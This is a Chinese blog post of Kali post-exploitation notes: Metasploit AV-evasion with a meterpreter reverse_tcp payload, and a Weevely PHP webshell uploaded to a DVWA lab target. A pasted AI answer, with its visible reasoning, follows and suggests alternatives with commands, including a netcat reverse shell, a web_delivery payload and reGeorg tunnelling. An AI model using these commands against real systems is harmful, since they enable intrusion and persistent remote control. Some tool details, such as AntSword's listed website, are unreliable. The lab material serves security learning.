kali里的powersploit、evasion、weevely等工具的杂项记录

这篇博客介绍了如何在Kali Linux中使用PostExploitation工具,特别是OSBackdoors,启动Python Web服务器,并在Windows测试机上利用Powershell进行免杀攻击。通过Metasploit框架展示如何选择免杀模块,设置参数并执行payload。此外,还讲解了如何创建并使用PHP网页木马Weevely,以及如何在靶机上上传和激活。博客还提到了文件隐藏和远程操作命令的使用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在kali菜单项里的Post Exploitation(后渗透)里的OS Backdoors可以找到该工具

点击后其实是进入一个目录

 然后利用python启动一个WEB服务器

在win测试机上启动power shell,同时打开一个浏览器,输入http://kali的IP:8000

msf框架里的evasion

  • msfconsole
  • show evasion   // 查看免杀模块

  •  use evasion/windows/windows_defender_exe
  • show options   // 查看参数

  • set filename test.exe   //自己定义一个文件名,不然是随机起名 
  • set payload windows/meterpreter/reverse_tcp
  • run

 这是一个隐藏目录

可以使用命令  

将文件移动到可视位置 

学习时可以扔到https://www.virscan.org等平台检测一下

weevely只能生成PHP的网页木马 在kali里执行

weevely generate 123456 /home/kali/test.php

其中123456是密码 

到靶机dvwa上传

上传成功后,根据页面提示的路径访问一下木马网页

 回到kali,执行 

  • weevely http://192.168.107.130/dvwa/hackable/uploads/test.php 123456
  • 密码要放在最后,且须与前面设置的一致

输入  help 查看可用的远程操作的命令

 

 

 

 

 

 

<think>嗯,用户之前问过关于Weevely3的错误问题,现在他们想知道Kali Linux中有哪些工具可以替代Weevely3。我需要先回顾一下之前的对话,确保这次回答连贯。用户可能在进行渗透测试,尤其是Web后门方面的工作,所以他们需要一个可靠的工具替代品。 首先,我应该考虑Weevely3的主要功能。Weevely3主要用于生成和管理PHP后门,提供文件管理、Shell访问、提权等功能。用户遇到的错误提示可能让他们觉得Weevely3已经过时或者有兼容性问题,所以需要替代工具。 接下来,我需要列出Kali Linux中常见的后门管理工具。常见的可能有PhpSploit、Pwncat、Cobalt Strike、Metasploit的模块、WebShells等。每个工具的特点需要简要说明,比如是否支持Python3、功能范围、使用难度等。 还要注意用户可能的需求,比如是否需要开源免费、是否需要图形界面、是否适合特定场景(比如内网渗透)。例如,Cobalt Strike功能强大但商业付费,而Metasploit的Web Delivery模块可能更适用于某些情况。 此外,用户可能对工具的维护状态和社区支持感兴趣。比如,PhpSploit是活跃的开源项目,而Weevely3已经停止更新,这点需要强调。同时,像Pwncat这样的工具虽然功能强大,但可能需要Python环境,用户可能需要安装依赖。 还要考虑用户的技术水平,是否需要简单易用的工具,或者是否需要高级功能。比如,冰蝎和哥斯拉适合WebShell管理,但可能需要配置。而Netcat和Socat更基础,适合简单反向Shell。 最后,应该提供选择建议,帮助用户根据具体需求挑选合适的工具。比如,如果用户需要主动维护的PHP后门工具,推荐PhpSploit;如果需要多功能后渗透,推荐Pwncat或Metasploit。 需要确保信息准确,每个工具的特点和示例命令正确无误。同时,提醒用户注意法律和授权问题,确保渗透测试在合法范围内进行。</think>以下是针对**Kali Linux**环境下可替代Weevely3的工具推荐,根据使用场景分类整理: --- ### 一、PHP WebShell管理工具(直接替代) | 工具名称 | 特点 | 项目地址 | |---------------|----------------------------------------------------------------------|---------------------------------------------| | **PhpSploit** | - 完全兼容Python3<br>- 加密通信 + 绕过WAF<br>- 支持文件/数据库/提权操作 | [GitHub](https://github.com/nil0x42/phpsploit) | | **AntSword** | - 图形化WebShell管理工具<br>- 插件扩展丰富<br>- 支持多语言后门 | [官网](https://ant.design/) | | **C99** | - 经典PHP WebShell<br>- 基础文件管理功能 | (需自行搜索资源) | **示例(PhpSploit)**: ```bash # 生成PHP后门 phpsploit -generate -payload php -password admin -output shell.php # 连接目标 phpsploit -target http://victim.com/shell.php -password admin ``` --- ### 二、多功能后渗透框架(高级替代) | 工具名称 | 优势 | 适用场景 | |-----------------|----------------------------------------------------------------------|-----------------------------| | **Pwncat** | - 基于Python3<br>- 支持多平台反弹Shell持久化<br>- 自动提权模块 | Linux/Windows内网渗透 | | **Cobalt Strike** | - 可视化协同作战<br>- 强大的横向移动能力<br>- 商业级漏洞利用 | 红队行动/APT模拟 | | **Metasploit** | - `web_delivery`模块生成Payload<br>- 集成漏洞利用链 | 快速部署反向Shell | **Metasploit示例**: ```bash use exploit/multi/script/web_delivery set target PHP set payload php/meterpreter/reverse_tcp set LHOST 192.168.1.100 exploit # 生成PHP代码在目标执行即可获得Meterpreter会话 ``` --- ### 三、轻量级替代方案 | 工具类型 | 工具示例 | 典型用法 | |---------------|-------------------------|-------------------------------------| | **反向Shell** | Netcat / Socat / Ncat | `nc -e /bin/sh 192.168.1.100 4444` | | **加密隧道** | Chisel / Stowaway | 穿透防火墙进行内网漫游 | | **Web代理** | TinyShell / reGeorg | 通过HTTP协议建立Socks代理 | **reGeorg使用流程**: 1. 上传`tunnel.php`到Web服务器 2. 本地执行: ```bash python reGeorgSocksProxy.py -p 8080 -u http://victim.com/tunnel.php ``` 3. 使用Proxychains全局代理流量 --- ### 四、国产工具推荐 | 工具名称 | 特色功能 | |------------|--------------------------------------------------------------------------| | **冰蝎** | - 动态密钥加密通信<br>- 支持文件管理和命令执行 | | **哥斯拉** | - 多类型Payload支持<br>- 流量混淆绕过IDS | | **GodPot** | - 集成WebShell管理+漏洞扫描<br>- 自动化后渗透工作流 | --- ### 五、选择建议 | 需求场景 | 推荐工具 | |--------------------------|----------------------------------| | 快速部署PHP后门 | PhpSploit / AntSword | | 长期控制+横向移动 | Cobalt Strike / Pwncat | | 简单反向Shell | Metasploit `web_delivery`模块 | | 内网穿透+代理 | Chisel + reGeorg组合使用 | --- ### 附:工具对比矩阵 | 特性 | Weevely3 | PhpSploit | Pwncat | Metasploit | |---------------------|----------|-----------|--------|------------| | 维护状态 | ✖ 停止 | ✔ 活跃 | ✔ 活跃 | ✔ 活跃 | | Python3兼容 | ✖ | ✔ | ✔ | ✔ | | 加密通信 | 基础AES | 动态密钥 | TLS | 可配置 | | 自动提权 | ✔ | ✔ | ✔ | ✔ | | 图形界面 | ✖ | ✖ | ✖ | ✔(Armitage)| --- **注意事项**: 1. 所有操作需在**合法授权**范围内进行 2. 建议在隔离环境测试工具(如使用Kali官方VM镜像) 3. 复杂场景推荐组合使用工具,例如: - 用`web_delivery`部署初始访问 - 通过`Chisel`建立隧道 - 使用`Pwncat`进行权限维持 如需具体工具的详细使用教程,可告知您的重点需求方向。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值